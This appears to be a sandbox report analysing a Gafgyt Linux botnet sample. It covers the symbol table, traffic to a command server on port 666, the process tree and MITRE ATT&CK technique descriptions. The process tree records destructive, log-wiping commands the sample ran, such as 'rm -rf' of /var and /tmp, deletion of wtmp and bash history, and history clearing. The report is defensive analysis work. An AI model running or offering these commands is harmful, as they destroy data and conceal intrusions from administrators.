open.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
opendir	.symtab	0x40dcc4	260	FUNC	<unknown>	DEFAULT	3
opendir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
opennameservers.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
ourIP	.symtab	0x458e84	4	OBJECT	<unknown>	DEFAULT	13
p.4630	.symtab	0x4583b0	0	OBJECT	<unknown>	DEFAULT	10
parse_config.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
pids	.symtab	0x458e8c	4	OBJECT	<unknown>	DEFAULT	13
poll	.symtab	0x414820	92	FUNC	<unknown>	DEFAULT	3
poll.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
prctl	.symtab	0x4076f0	124	FUNC	<unknown>	DEFAULT	3
prctl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
prefix.4694	.symtab	0x416df0	12	OBJECT	<unknown>	DEFAULT	5
print	.symtab	0x4013e0	1460	FUNC	<unknown>	DEFAULT	3
printchar	.symtab	0x400e50	184	FUNC	<unknown>	DEFAULT	3
printi	.symtab	0x401144	668	FUNC	<unknown>	DEFAULT	3
prints	.symtab	0x400f08	572	FUNC	<unknown>	DEFAULT	3
processCmd	.symtab	0x4051bc	4124	FUNC	<unknown>	DEFAULT	3
program_invocation_name	.symtab	0x458948	4	OBJECT	<unknown>	DEFAULT	10
program_invocation_short_name	.symtab	0x458944	4	OBJECT	<unknown>	DEFAULT	10
qual_chars.4702	.symtab	0x416e10	20	OBJECT	<unknown>	DEFAULT	5
raise	.symtab	0x4113d0	76	FUNC	<unknown>	DEFAULT	3
raise.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand	.symtab	0x40bc10	28	FUNC	<unknown>	DEFAULT	3
rand.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand_cmwc	.symtab	0x400484	468	FUNC	<unknown>	DEFAULT	3
random	.symtab	0x40bc30	164	FUNC	<unknown>	DEFAULT	3
random.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
random_poly_info	.symtab	0x417ab0	40	OBJECT	<unknown>	DEFAULT	5
random_r	.symtab	0x40c054	172	FUNC	<unknown>	DEFAULT	3
random_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
randtbl	.symtab	0x458878	128	OBJECT	<unknown>	DEFAULT	10
rawmemchr	.symtab	0x410ac0	192	FUNC	<unknown>	DEFAULT	3
rawmemchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
read	.symtab	0x4079b0	88	FUNC	<unknown>	DEFAULT	3
read.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
read_etc_hosts_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
read_until_response	.symtab	0x400a1c	208	FUNC	<unknown>	DEFAULT	3
read_with_timeout	.symtab	0x4008b4	360	FUNC	<unknown>	DEFAULT	3
readdir64	.symtab	0x40dec0	272	FUNC	<unknown>	DEFAULT	3
readdir64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
realloc	.symtab	0x411580	1156	FUNC	<unknown>	DEFAULT	3
realloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
recv	.symtab	0x40a510	92	FUNC	<unknown>	DEFAULT	3
recv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
recvLine	.symtab	0x402040	876	FUNC	<unknown>	DEFAULT	3
reset_telstate	.symtab	0x400c20	100	FUNC	<unknown>	DEFAULT	3
resolv_conf_mtime.5363	.symtab	0x45f188	4	OBJECT	<unknown>	DEFAULT	14
rindex	.symtab	0x410ce0	160	FUNC	<unknown>	DEFAULT	3
sbrk	.symtab	0x40d770	164	FUNC	<unknown>	DEFAULT	3
sbrk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
scanPid	.symtab	0x458e88	4	OBJECT	<unknown>	DEFAULT	13
sclose	.symtab	0x403aa4	128	FUNC	<unknown>	DEFAULT	3
select	.symtab	0x40792c	32	FUNC	<unknown>	DEFAULT	3
select.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
send	.symtab	0x40a570	92	FUNC	<unknown>	DEFAULT	3
send.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sendto	.symtab	0x40a654	32	FUNC	<unknown>	DEFAULT	3
sendto.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
seteuid	.symtab	0x4074e0	212	FUNC	<unknown>	DEFAULT	3
seteuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setresuid	.symtab	0x407c40	92	FUNC	<unknown>	DEFAULT	3
setresuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setreuid	.symtab	0x4077f0	92	FUNC	<unknown>	DEFAULT	3
setreuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setsockopt	.symtab	0x40a680	124	FUNC	<unknown>	DEFAULT	3
setsockopt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setstate	.symtab	0x40bcd4	184	FUNC	<unknown>	DEFAULT	3
setstate_r	.symtab	0x40bf10	324	FUNC	<unknown>	DEFAULT	3
setuid	.symtab	0x407650	144	FUNC	<unknown>	DEFAULT	3
setuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigaction	.symtab	0x40d630	28	FUNC	<unknown>	DEFAULT	3
sigaction.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
signal	.symtab	0x40a760	236	FUNC	<unknown>	DEFAULT	3
signal.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigprocmask	.symtab	0x40da10	96	FUNC	<unknown>	DEFAULT	3
sigprocmask.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigsetops.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
skip_and_NUL_space	.symtab	0x413c48	104	FUNC	<unknown>	DEFAULT	3
skip_nospace	.symtab	0x413be0	104	FUNC	<unknown>	DEFAULT	3
sleep	.symtab	0x40c770	288	FUNC	<unknown>	DEFAULT	3
sleep.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
socket	.symtab	0x40a700	88	FUNC	<unknown>	DEFAULT	3
socket.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
socket_connect	.symtab	0x404cec	444	FUNC	<unknown>	DEFAULT	3
sockprintf	.symtab	0x401a84	384	FUNC	<unknown>	DEFAULT	3
spec_and_mask.4701	.symtab	0x416e24	16	OBJECT	<unknown>	DEFAULT	5
spec_base.4693	.symtab	0x416dfc	7	OBJECT	<unknown>	DEFAULT	5
spec_chars.4698	.symtab	0x416e80	21	OBJECT	<unknown>	DEFAULT	5
spec_flags.4697	.symtab	0x416e98	8	OBJECT	<unknown>	DEFAULT	5
spec_or_mask.4700	.symtab	0x416e34	16	OBJECT	<unknown>	DEFAULT	5
spec_ranges.4699	.symtab	0x416e44	9	OBJECT	<unknown>	DEFAULT	5
sprintf	.symtab	0x407d90	80	FUNC	<unknown>	DEFAULT	3
sprintf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
srand	.symtab	0x40be5c	172	FUNC	<unknown>	DEFAULT	3
srandom	.symtab	0x40be5c	172	FUNC	<unknown>	DEFAULT	3
srandom_r	.symtab	0x40c100	400	FUNC	<unknown>	DEFAULT	3
stat	.symtab	0x414950	144	FUNC	<unknown>	DEFAULT	3
stat.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
stderr	.symtab	0x458708	4	OBJECT	<unknown>	DEFAULT	10
stdin	.symtab	0x458700	4	OBJECT	<unknown>	DEFAULT	10
stdout	.symtab	0x458704	4	OBJECT	<unknown>	DEFAULT	10
strcasecmp	.symtab	0x415130	108	FUNC	<unknown>	DEFAULT	3
strcasecmp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strcasestr	.symtab	0x40a0d0	128	FUNC	<unknown>	DEFAULT	3
strcasestr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strchr	.symtab	0x409d90	248	FUNC	<unknown>	DEFAULT	3
strchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strchrnul	.symtab	0x410dd0	248	FUNC	<unknown>	DEFAULT	3
strchrnul.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strcmp	.symtab	0x409b70	44	FUNC	<unknown>	DEFAULT	3
strcmp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strcoll	.symtab	0x409b70	44	FUNC	<unknown>	DEFAULT	3
strcpy	.symtab	0x409ca0	36	FUNC	<unknown>	DEFAULT	3
strcpy.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strcspn	.symtab	0x410a30	144	FUNC	<unknown>	DEFAULT	3
strcspn.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strdup	.symtab	0x414a90	140	FUNC	<unknown>	DEFAULT	3
strdup.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strerror_r	.symtab	0x409f20	388	FUNC	<unknown>	DEFAULT	3
strlen	.symtab	0x409ab0	184	FUNC	<unknown>	DEFAULT	3
strlen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strncpy	.symtab	0x409cd0	188	FUNC	<unknown>	DEFAULT	3
strncpy.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strnlen	.symtab	0x409ba0	248	FUNC	<unknown>	DEFAULT	3
strnlen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strpbrk	.symtab	0x410ed0	64	FUNC	<unknown>	DEFAULT	3
strpbrk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strrchr	.symtab	0x410ce0	160	FUNC	<unknown>	DEFAULT	3
strrchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strspn	.symtab	0x410c90	72	FUNC	<unknown>	DEFAULT	3
strspn.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strstr	.symtab	0x4099b0	256	FUNC	<unknown>	DEFAULT	3
strstr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtok	.symtab	0x409f00	32	FUNC	<unknown>	DEFAULT	3
strtok.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtok_r	.symtab	0x410960	208	FUNC	<unknown>	DEFAULT	3
strtok_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtol	.symtab	0x40c400	28	FUNC	<unknown>	DEFAULT	3
strtol.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
successes	.symtab	0x458644	48	OBJECT	<unknown>	DEFAULT	10
sysconf	.symtab	0x40ca8c	748	FUNC	<unknown>	DEFAULT	3
sysconf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
system	.symtab	0x40d360	568	FUNC	<unknown>	DEFAULT	3
system.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
szprintf	.symtab	0x401a0c	120	FUNC	<unknown>	DEFAULT	3
tcgetattr	.symtab	0x40a190	176	FUNC	<unknown>	DEFAULT	3
tcgetattr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
tcpcsum	.symtab	0x403810	348	FUNC	<unknown>	DEFAULT	3
time	.symtab	0x4076e0	16	FUNC	<unknown>	DEFAULT	3
time.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
toupper	.symtab	0x407d30	60	FUNC	<unknown>	DEFAULT	3
toupper.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
trim	.symtab	0x400c84	460	FUNC	<unknown>	DEFAULT	3
type_codes	.symtab	0x416e50	24	OBJECT	<unknown>	DEFAULT	5
type_sizes	.symtab	0x416e68	12	OBJECT	<unknown>	DEFAULT	5
uname	.symtab	0x4150d0	88	FUNC	<unknown>	DEFAULT	3
uname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
unknown.1326	.symtab	0x416f20	14	OBJECT	<unknown>	DEFAULT	5
unsafe_state	.symtab	0x458900	20	OBJECT	<unknown>	DEFAULT	10
useragents	.symtab	0x4583e0	144	OBJECT	<unknown>	DEFAULT	10
vsnprintf	.symtab	0x407de0	252	FUNC	<unknown>	DEFAULT	3
vsnprintf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wait4	.symtab	0x40d650	92	FUNC	<unknown>	DEFAULT	3
wait4.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
waitpid	.symtab	0x4077d0	28	FUNC	<unknown>	DEFAULT	3
waitpid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcrtomb	.symtab	0x40e5b0	108	FUNC	<unknown>	DEFAULT	3
wcrtomb.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcsnrtombs	.symtab	0x40e660	216	FUNC	<unknown>	DEFAULT	3
wcsnrtombs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wcsrtombs	.symtab	0x40e620	64	FUNC	<unknown>	DEFAULT	3
wcsrtombs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
wildString	.symtab	0x401c04	656	FUNC	<unknown>	DEFAULT	3
write	.symtab	0x407b80	88	FUNC	<unknown>	DEFAULT	3
write.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
xdigits.3351	.symtab	0x418304	17	OBJECT	<unknown>	DEFAULT	5
xstatconv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
zprintf	.symtab	0x401994	120	FUNC	<unknown>	DEFAULT	3

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 7
• 666 undefined
• 443 (HTTPS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 21, 2025 20:36:53.229598999 CEST	42644	666	192.168.2.13	31.58.58.113
Apr 21, 2025 20:36:53.509057045 CEST	666	42644	31.58.58.113	192.168.2.13
Apr 21, 2025 20:36:53.509124041 CEST	42644	666	192.168.2.13	31.58.58.113
Apr 21, 2025 20:36:53.639194965 CEST	42644	666	192.168.2.13	31.58.58.113
Apr 21, 2025 20:36:53.788546085 CEST	666	42644	31.58.58.113	192.168.2.13
Apr 21, 2025 20:36:53.788567066 CEST	666	42644	31.58.58.113	192.168.2.13
Apr 21, 2025 20:36:53.788635015 CEST	42644	666	192.168.2.13	31.58.58.113
Apr 21, 2025 20:36:53.835352898 CEST	42644	666	192.168.2.13	31.58.58.113
Apr 21, 2025 20:36:53.918679953 CEST	666	42644	31.58.58.113	192.168.2.13
Apr 21, 2025 20:36:54.067776918 CEST	666	42644	31.58.58.113	192.168.2.13
Apr 21, 2025 20:36:54.114613056 CEST	666	42644	31.58.58.113	192.168.2.13
Apr 21, 2025 20:37:02.095412016 CEST	48202	443	192.168.2.13	185.125.190.26
Apr 21, 2025 20:37:33.071611881 CEST	48202	443	192.168.2.13	185.125.190.26

System Behavior

Analysis Process: GHfjfgvj.elf PID: 5429, Parent PID: 5352

General

Start time (UTC):	18:36:52
Start date (UTC):	21/04/2025
Path:	/tmp/GHfjfgvj.elf
Arguments:	/tmp/GHfjfgvj.elf
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

File Activities

File Opened

File Read

Process Activities

Process Forked

Prctl Requested

Thread Sleep

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: GHfjfgvj.elf PID: 5431, Parent PID: 5429

General

Start time (UTC):	18:36:52
Start date (UTC):	21/04/2025
Path:	/tmp/GHfjfgvj.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Process Activities

Process Forked

Thread Sleep

Chronological Activities

Analysis Process: GHfjfgvj.elf PID: 5433, Parent PID: 5431

General

Start time (UTC):	18:36:52
Start date (UTC):	21/04/2025
Path:	/tmp/GHfjfgvj.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Process Activities

Process Forked

Thread Sleep

Chronological Activities

Analysis Process: GHfjfgvj.elf PID: 5435, Parent PID: 5433

General

Start time (UTC):	18:36:52
Start date (UTC):	21/04/2025
Path:	/tmp/GHfjfgvj.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

File Activities

File Opened

File Written

Process Activities

Process Forked

Thread Sleep

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: GHfjfgvj.elf PID: 5444, Parent PID: 5435

General

Start time (UTC):	18:36:53
Start date (UTC):	21/04/2025
Path:	/tmp/GHfjfgvj.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Process Activities

Process Overlayed (Exec)

Thread Sleep

Chronological Activities

Analysis Process: sh PID: 5444, Parent PID: 5435

General

Start time (UTC):	18:36:53
Start date (UTC):	21/04/2025
Path:	/bin/sh
Arguments:	sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Directory Enumerated

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5446, Parent PID: 5444

General

Start time (UTC):	18:36:53
Start date (UTC):	21/04/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: rm PID: 5446, Parent PID: 5444

General

Start time (UTC):	18:36:53
Start date (UTC):	21/04/2025
Path:	/usr/bin/rm
Arguments:	rm -rf /tmp/GHfjfgvj.elf /tmp/config-err-IN1GlB /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-ntFb5z3TQVeu /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rehHTg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-ljPrVi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-jxKacf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-9mYjrg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-Agc19e /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-VKEayg /tmp/vmware-root_727-4290690966 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rJRv0g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-2NWDdf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-hlfXcf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-YlFEtg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-GDC7pj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-hWhmqg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-FqJmSi
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

File Activities

File Opened

File Deleted

File Read

Directory Enumerated

Chronological Activities

Analysis Process: GHfjfgvj.elf PID: 5450, Parent PID: 5435

General

Start time (UTC):	18:36:58
Start date (UTC):	21/04/2025
Path:	/tmp/GHfjfgvj.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Process Activities

Process Overlayed (Exec)

Thread Sleep

Chronological Activities

Analysis Process: sh PID: 5450, Parent PID: 5435

General

Start time (UTC):	18:36:58
Start date (UTC):	21/04/2025
Path:	/bin/sh
Arguments:	sh -c "rm -rf /var/log/wtmp"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5456, Parent PID: 5450

General

Start time (UTC):	18:36:58
Start date (UTC):	21/04/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: rm PID: 5456, Parent PID: 5450

General

Start time (UTC):	18:36:58
Start date (UTC):	21/04/2025
Path:	/usr/bin/rm
Arguments:	rm -rf /var/log/wtmp
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

File Activities

File Opened

File Deleted

File Read

Chronological Activities

Analysis Process: GHfjfgvj.elf PID: 5457, Parent PID: 5435

General

Start time (UTC):	18:36:58
Start date (UTC):	21/04/2025
Path:	/tmp/GHfjfgvj.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Process Activities

Process Overlayed (Exec)

Thread Sleep

Chronological Activities

Analysis Process: sh PID: 5457, Parent PID: 5435

General

Start time (UTC):	18:36:58
Start date (UTC):	21/04/2025
Path:	/bin/sh
Arguments:	sh -c "rm -rf ~/.bash_history"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5462, Parent PID: 5457

General

Start time (UTC):	18:36:58
Start date (UTC):	21/04/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: rm PID: 5462, Parent PID: 5457

General

Start time (UTC):	18:36:58
Start date (UTC):	21/04/2025
Path:	/usr/bin/rm
Arguments:	rm -rf /root/.bash_history
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

File Activities

File Opened

File Deleted

File Read

Chronological Activities

Analysis Process: GHfjfgvj.elf PID: 5463, Parent PID: 5435

General

Start time (UTC):	18:36:58
Start date (UTC):	21/04/2025
Path:	/tmp/GHfjfgvj.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Process Activities

Process Overlayed (Exec)

Thread Sleep

Chronological Activities

Analysis Process: sh PID: 5463, Parent PID: 5435

General

Start time (UTC):	18:36:58
Start date (UTC):	21/04/2025
Path:	/bin/sh
Arguments:	sh -c "history -c;history -w"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report GHfjfgvj.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Threatname: Gafgyt

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/run/systemd/resolve/stub-resolv.conf

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Symbols

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: GHfjfgvj.elf PID: 5429, Parent PID: 5352

General

File Activities

File Opened

File Read

Process Activities

Process Forked

Prctl Requested

Thread Sleep

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: GHfjfgvj.elf PID: 5431, Parent PID: 5429

General

Process Activities

Linux Analysis Report
GHfjfgvj.elf